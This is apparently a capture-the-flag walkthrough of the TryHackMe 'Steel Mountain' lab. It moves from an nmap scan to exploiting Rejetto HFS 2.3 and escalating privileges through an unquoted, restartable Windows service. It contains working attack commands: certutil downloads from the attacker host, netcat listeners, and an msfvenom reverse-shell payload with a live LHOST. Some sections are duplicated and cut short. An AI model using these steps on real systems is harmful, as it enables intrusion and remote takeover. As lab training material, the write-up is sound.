#TryHackMe-Steel Mountain ## NMAP ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT [13/93] Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining) Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining) Nmap scan report for 10.10.252.157 Host is up (0.18s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 3389/tcp open ssl/ms-wbt-server? |_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time. 8080/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49163/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown) |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-10-26T18:26:30 |_ start_date: 2020-10-26T18:21:06 ``` ## PORT 80 `Who is the employee of the month?` Visit the web page on port 80 then look at the source of the web page and you'll image name which is the answer to the question. `Scan the machine with nmap. What is the other port running a web server on?` PORT 8080 ## PORT 8080 Clicking below at the link `HttpFileServer 2.3` will redirect you to a page `Take a look at the other web server. What file server is running?` Rejetto Http File Server `What is the CVE number to exploit this file server?` ## Searchsploit Now we know that it's using Rejetto Http File Server version 2.3 so let's find exploits for it Let's try using this exploit https://www.exploit-db.com/exploits/39161 Change the local IP and local port if you want doesn't matter if you use the default `443` port in this exploit Now host the `nc.exe` on you local machine which can be downloaded from github `https://github.com/int0x33/nc.exe/blob/master/nc.exe` or if your using kali linux then it will be available to `/usr/share/windows-resources/binaries/nc.exe` Hosting this file can be through python but remember to keep the port on `80` because that's the default port that http listens on `python3 -m http.server 80` Also set up a net cat listener `nc -lvp [port]` Run the exploit with python2 39161 8080 Run it again because the first time you ran it just downloaded it but now when you run this exploit again it will execute `nc.exe` Now upload `winPEAS.exe` on the machine for that host that file locally then download it on targeted machine ``` C:\Users\bill\Desktop>certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe **** Online **** CertUtil: -URLCache command completed successfully. C:\Users\bill\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 2E4A-906A Directory of C:\Users\bill\Desktop 10/26/2020 02:31 PM . 10/26/2020 02:31 PM .. 10/26/2020 01:57 PM 600,580 PowerUp.ps1 09/27/2019 05:42 AM 70 user.txt 10/26/2020 02:31 PM 472,064 winpeas.exe 3 File(s) 1,072,714 bytes 2 Dir(s) 44,155,019,264 bytes free C:\Users\bill\Desktop> ``` Now by simply typing .\winpeas.exe We can see that this services can be exploited so let's generate a payload named as `ASCService.exe` ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe ``` Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again ### Stoppping the service ``` C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9 sc stop AdvancedSystemCareService9 SERVICE_NAME: AdvancedSystemCareService9 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 4 RUNNING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 ``` ### Starting the service ## Metasploit No we want to escalate our root privileges so we will run `Powerup.ps1` powershell script to look for misconfigurations on targeted windows machine To enter into powershell first write `load powershell` then `powershell_shell` Run `. .\PowerUp.ps1` and `Invoke-AllChecks` Now check for service having `canRestart` set to True And name of the service is `AdvancedSystemCareService9` Now generate a payload with name `ASCService.exe` ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe ``` Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again ### Stoppping the service ``` C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9 sc stop AdvancedSystemCareService9 SERVICE_NAME: AdvancedSystemCareService9 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 4 RUNNING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 ``` ### Starting the service